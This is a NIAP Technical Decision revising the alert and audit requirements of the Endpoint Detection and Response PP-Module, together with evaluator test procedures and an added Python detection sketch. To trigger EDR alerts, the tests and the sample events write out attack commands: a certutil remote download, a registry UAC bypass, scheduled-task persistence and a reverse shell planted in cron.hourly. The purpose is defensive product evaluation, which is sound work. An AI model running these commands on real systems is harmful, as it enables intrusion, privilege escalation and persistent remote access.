NIAP/CCEVS
TD0757:  Clarifications for changes in Host Agent enrollment status in EDR PP-Module

Publication Date
2023.07.14

Protection Profiles
MOD_EDR_V1.0

Other References
FAU_ALT_EXT.1.1, FAU_GEN.1/EDR, MOD_EDR_V1.0-SD

Issue Description

The functionality for the “a. Change in Host Agent enrollment status” bullet in the FAU_ALT_EXT.1.1 SFR in the PP-Module for Endpoint Detection and Response Version 1.0 does not fit the context of the SFR or its assurance activities, and potentially creates other inconsistencies in the PP-Module.

One of the guidance evaluation activities for FAU_ALT_EXT.1.3 in the Supporting Document for MOD_EDR_V1.0 implies a requirement that is not present in the SFR and is not sufficiently clear on the level of detail required.

Resolution

The following modifications are made to FAU_ALT_EXT.1.1 in MOD_EDR_V1.0, with removed text in red strikethrough and added text in green underline.

FAU_ALT_EXT.1.1 The EDR shall alert authorized users on a management dashboard in the event of any of the following: detection of potentially unauthorized activity on enrolled endpoints.

a. Change in Host Agent enrollment status;

b. Detection of potentially unauthorized activity on enrolled endpoints

Application Note: The intent of this requirement is to specify the minimum set of management dashboard alert capabilities the EDR must be capable of displaying to an authorized user.

Examples of detection of potentially unauthorized activity on enrolled endpoints include anomalous activity, escalation of privileges, and lateral movement.

The following modifications are made to FAU_ALT_EXT.1.1 in MOD_EDR_V1.0 SD, with removed text in red strikethrough and added text in green underline.

TD0735 is archived and replaced with the following:

FAU_ALT_EXT.1 Server Alerts

TSS

The evaluator shall examine the TSS to ensure that it describes how alerts for changes in Host Agent enrollment status and potentially unauthorized activities on enrolled endpoints are detected and displayed. The evaluator shall examine the TSS to ensure it contains the list of unauthorized activity types categorized or labeled by the EDR upon detection.

The evaluator shall examine the TSS to ensure that it describes how alert visualizations are displayed and what content is included.

The evaluator shall examine the TSS to ensure that it describes what formats are supported.

Guidance

The evaluator shall review operational guidance to ensure that it contains documentation on enrolling and unenrolling Host Agents from the EDR.

The evaluator shall review operational guidance to identify a list of unauthorized activity types categorized or labeled by the EDR upon detection.

The evaluator shall ensure guidance includes any needed configuration information for displaying alerts in relation to changes in Host Agent enrollment status and potentially unauthorized activities.

The evaluator shall review the operational guidance to ensure that it contains documentation on using the management dashboard to visualize and view alerts.

The evaluator shall review the operational guidance to ensure that it contains documentation on the products supported for exporting alerts in standards-based formats.

The evaluator shall examine the guidance documentation to ensure it describes the formats supported and the methods of data export being claimed (e.g., written to a file on the underlying platform, communication over a TOE interface to another product, etc.). If communication over a TOE interface to another product (other than the underlying platform) is required to export the data, the evaluator shall verify the guidance documentation describes what products or product types are supported, how to establish communication with those products, any requirements on those products (particular communication protocol, version of the protocol required, etc.), and the configuration of the TOE needed to communicate with those products.


Tests

The evaluator shall perform the following tests:

The evaluator shall follow guidance to unenroll a Host Agent from the EDR and verify that the unenrollment action is recorded in an auditable and timestamped activity log.

The evaluator shall follow guidance to enroll a Host Agent to the EDR and verify that the enrollment action is recorded in an auditable and timestamped activity log.

For Windows, the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that corresponding alerts were generated in the management dashboard:

  • Test 1: The evaluator shall open a Windows command prompt as a user and run the command cmd /c certutil -urlcache -split -f <remote file> <download directory>, where the remote file is a valid file path to an accessible, remotely stored executable, and the download directory is a valid directory path writable by the current local user.
  • Test 2: The evaluator shall open a Windows command prompt as a user and run the command reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "<local executable>" /f, where the local executable is a valid file path to a readable, local executable. The evaluator will then run the command cmd.exe /c eventvwr.msc in the same command prompt window.
  • Test 3: The evaluator shall open a Windows command prompt as a user and run the command SCHTASKS /Create /SC ONCE /TN spawn /TR "<local executable>" /ST <time>, where the local executable is a valid file path to a readable, local executable, and time is a start time that occurs within minutes of the task being created.

For Linux, the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that corresponding alerts were generated in the management dashboard:

  • Test 1: The evaluator shall open a terminal and run the command scp <remote user>@<remote host>:<remote path> <download directory>, where the remote user is a valid user on the remote host, the remote path is a valid path to a remotely stored executable, and the download directory is a valid directory path writable by the current local user. The remote user's password shall be provided when prompted.
  • Test 2: The evaluator shall open a terminal and run the command echo "bash -i >& /dev/tcp/<outside IP>/5050 0>&1 1 &" > /etc/cron.hourly/persist, where the outside IP is a valid external address.

For all platforms:

  • Test 1: The evaluator shall review an alert on the management dashboard and verify that the alert contains a severity field and the fields specified in the ST. The evaluator will open or view the alert and verify that a timeline of events is available for review. The timeline shall show a progression of events over time.
  • Test 2: The evaluator shall pick an alert on the management dashboard and export the alert in every format specified in the ST. The evaluator shall review the operational guidance and the selection from the requirement and verify that export options exist for all the declared formats in the selection. After exporting one alert for each possible format the evaluator shall review the file contents of the exported alert and verify it is the correct format for the selected export option (for example, an export of the IODEF type must contain 'IODEF-Document' in the first element of the exported file).
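As an added illustration (not part of this Technical Decision or of any EDR product), the Python sketch below runs constructed process-creation records resembling the Windows and Linux subtests above through a small rule set and produces alerts that carry a severity field and an ordered event timeline, the two properties the all-platforms Test 1 checks on the dashboard. Rule names, severities, hostnames, paths, the example.test domain and the 198.51.100.7 address are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Rules over the process command line; names and severities are constructed for this example.
RULES = [
    ("certutil remote download", "high",
     re.compile(r"\bcertutil\b.*-urlcache\b.*-split\b", re.I)),
    ("mscfile handler hijack (eventvwr)", "high",
     re.compile(r"\breg(\.exe)?\s+add\s+hkcu\\software\\classes\\mscfile\\shell\\open\\command", re.I)),
    ("one-shot scheduled task", "medium",
     re.compile(r"\bschtasks\b.*/create\b.*/sc\s+once\b", re.I)),
    ("scp pull of remote file", "low",
     re.compile(r"^scp\s+\S+@\S+:\S+\s+\S+", re.I)),
    ("reverse shell written to cron.hourly", "high",
     re.compile(r"/dev/tcp/.*>\s*/etc/cron\.hourly/", re.I)),
]
# Later command on the same host that extends an open alert's timeline (eventvwr.msc after the reg change).
FOLLOW_ON = {"mscfile handler hijack (eventvwr)": re.compile(r"\beventvwr(\.msc)?\b", re.I)}

@dataclass
class Alert:
    rule: str
    severity: str  # the severity field every dashboard alert must carry
    host: str
    timeline: list = field(default_factory=list)  # (ts, cmdline) pairs, oldest first

def detect(events):
    """events: {'ts', 'host', 'cmdline'} dicts in a constructed sample format."""
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        for name, sev, pat in RULES:
            if pat.search(ev["cmdline"]):
                a = alerts.setdefault((ev["host"], name), Alert(name, sev, ev["host"]))
                a.timeline.append((ev["ts"], ev["cmdline"]))
        for name, pat in FOLLOW_ON.items():  # only extends an alert that already exists
            a = alerts.get((ev["host"], name))
            if a and pat.search(ev["cmdline"]):
                a.timeline.append((ev["ts"], ev["cmdline"]))
    return list(alerts.values())

SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"ts": "2023-07-14T10:00:05Z", "host": "win-01", "cmdline": r"cmd /c certutil -urlcache -split -f https://files.example.test/tool.exe C:\Users\eval\Downloads"},
    {"ts": "2023-07-14T10:01:00Z", "host": "win-01", "cmdline": r'reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Users\eval\tool.exe" /f'},
    {"ts": "2023-07-14T10:01:07Z", "host": "win-01", "cmdline": "cmd.exe /c eventvwr.msc"},
    {"ts": "2023-07-14T10:02:00Z", "host": "win-02", "cmdline": "cmd.exe /c eventvwr.msc"},  # no prior hijack: no alert
    {"ts": "2023-07-14T10:03:00Z", "host": "win-01", "cmdline": r'SCHTASKS /Create /SC ONCE /TN spawn /TR "C:\Users\eval\tool.exe" /ST 10:05'},
    {"ts": "2023-07-14T10:04:00Z", "host": "lin-01", "cmdline": "scp evaluator@198.51.100.7:/srv/files/tool /home/eval/Downloads"},
    {"ts": "2023-07-14T10:05:00Z", "host": "lin-01", "cmdline": 'echo "bash -i >& /dev/tcp/198.51.100.7/5050 0>&1 &" > /etc/cron.hourly/persist'},
]
```

Running detect(SAMPLE_EVENTS) yields five alerts (three for win-01, two for lin-01) and none for win-02, whose eventvwr.msc launch has no preceding handler change on that host.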

The following modifications are made to FAU_GEN.1.1/EDR in MOD_EDR_V1.0, with removed text in red strikethrough and added text in green underline.

FAU_GEN.1.1/EDR

Refinement: The EDR shall generate an audit record of the following auditable events:

a.    Start-up and shutdown of the audit functions;

b.    All auditable events for the [not specified] level of audit; and

[

a.    EDR management dashboard log in activity;

b.    Remediation commands sent to a Host Agent, affected endpoint, or network devices;

c.     EDR configuration changes;

d.    Change in Host Agent enrollment status;

e.    [assignment: Other auditable events]

].

Application Note: The intent of this requirement is to specify the minimum set of audit records generated about actions on the EDR.

The following modifications are made to FAU_GEN.1/EDR in MOD_EDR_V1.0 SD, with removed text in red strikethrough and added text in green underline.

FAU_GEN.1/EDR Audit Data Generation

TSS

The evaluator shall check the TSS and ensure that it lists all of the auditable events claimed in the SFR. The evaluator shall check to make sure that every audit event type specified by the SFR is described in the TSS.

The evaluator shall check the TSS and ensure that it provides a format for audit records. Each audit record format type must be covered, along with a brief description of each field.


Guidance

The evaluator shall check the administrative guide and ensure that it lists all of the auditable events claimed in the SFR. The evaluator shall check to make sure that every audit event type mandated by the SFR is described.

The evaluator shall examine the administrative guide and make a determination of which commands are related to the configuration (including enabling or disabling) of the mechanisms implemented in the EDR that are necessary to enforce the requirements specified in the PP-Module. The evaluator shall document the methodology or approach taken while determining which actions in the administrative guide are security relevant with respect to this PP-Module. The evaluator may perform this activity as part of the activities associated with ensuring the AGD_OPE guidance satisfies the requirements.

The evaluator shall check the administrative guide and ensure that it provides a format for audit records. Each audit record format type must be covered, along with a brief description of each field. The evaluator shall check to make sure that the description of the fields contains the information required in FAU_GEN.1.2/EDR.

The evaluator shall review operational guidance to ensure that it contains documentation on enrolling and unenrolling Host Agents from the EDR.


Tests

The evaluator shall perform the following tests:

  • Test 1: The evaluator shall log in to the EDR management dashboard and verify that audit log data describing the activity is recorded.
  • Test 2: The evaluator shall issue a valid remediation command provided by the EDR to a Host Agent and verify that audit log data describing the activity is recorded on the EDR management dashboard.
  • Test 3: The evaluator shall change a non-destructive EDR configuration option within the EDR management dashboard, change it back to the original setting, and verify that the audit log data describing the activity is recorded.
  • Test 4: The evaluator shall follow guidance to unenroll a Host Agent from the EDR and verify that the unenrollment action is recorded in an auditable and timestamped activity log.
  • Test 5: The evaluator shall follow guidance to enroll a Host Agent to the EDR and verify that the enrollment action is recorded in an auditable and timestamped activity log.
  • Test 6: The evaluator shall perform the action to generate all other auditable events listed in the assignment and verify the activity is recorded.

When verifying the test results from FAU_GEN.1.1/EDR, the evaluator shall ensure the audit records generated during testing match the format specified in the administrative guide, and that the fields in each audit record have the proper entries.

Note that the testing here can be accomplished in conjunction with the testing of the security mechanisms directly. For example, testing performed to ensure that the administrative guidance provided is correct verifies that AGD_OPE.1 is satisfied and should address the invocation of the administrative actions that are needed to verify the audit records are generated as expected.

Justification

“a. Change in Host Agent enrollment status” does not belong in FAU_ALT_EXT.1 and is better addressed in FAU_GEN.1/EDR.

FAU_ALT_EXT.1.3 does not require the TOE to communicate with another product to export data, as the TOE could output the data to a file, which could then be imported into another product. 

"Documentation on the products supported" could falsely imply that the vendor must provide all guidance needed for another product to receive and process the data.
